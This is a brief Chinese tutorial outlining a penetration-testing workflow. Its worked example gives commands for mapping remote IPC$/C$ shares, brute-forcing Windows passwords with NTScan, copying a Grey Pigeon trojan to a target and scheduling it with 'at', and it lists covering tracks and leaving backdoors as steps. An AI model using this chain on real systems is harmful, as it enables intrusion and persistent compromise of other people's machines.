渗透测试之路(二)--渗透简单测试流程
一、授权
二、信息收集:nslookup、whois
三、扫描漏洞
利用扫描软件扫描,如:ScanPort、NMap
手动测试端口号开发情况:telnet IP地址 测试端口
3.1、笼统扫描,nmap扫描ip范围和端口,如果扫描出的端口是80,那么服务器是用IIS还是apache发布的?发布的什么网站?
3.2、高级扫描,如IIS漏洞、然后扫描网站漏洞
四、漏洞利用
445漏洞利用之IPC$:
把别人电脑上的目录映射到本地:net use 盘符 文件夹目录 密码 /user:用户名
net use f: \\10.1.1.2\share 密码 /user:用户
net use f: \del或net use * \del
IPC$没有绝对路径,net use \\10.1.1.2\ipc$ 密码 /user:用户或net use f: \\10.1.1.2\ipc$ 密码 /user:用户或net use f: \\10.1.1.2\c$ 密码 /user:用户
五、提权
六、毁尸灭迹
七、留后门
八、渗透测试报告
九、提供解决方案
举个栗子:
1、Scanport扫描445端口
2、445漏洞利用之IPC$:
NTScan工具暴力破解用户名和密码:社会工程学密码字典生成器工具生成密码字典,放在NTScan工具目录下
3、IPC$没有绝对路径,net use \\10.1.1.2\ipc$ 密码 /user:用户
4、制作木马:利用灰鸽子软件
5、植入木马(留后门):copy 木马文件路径 \\10.1.1.2\c$
6、设置计划任务自动执行
net time \\10.1.1.2
at \\10.1.1.2 12:12 "木马文件路径"

浙公网安备 33010602011771号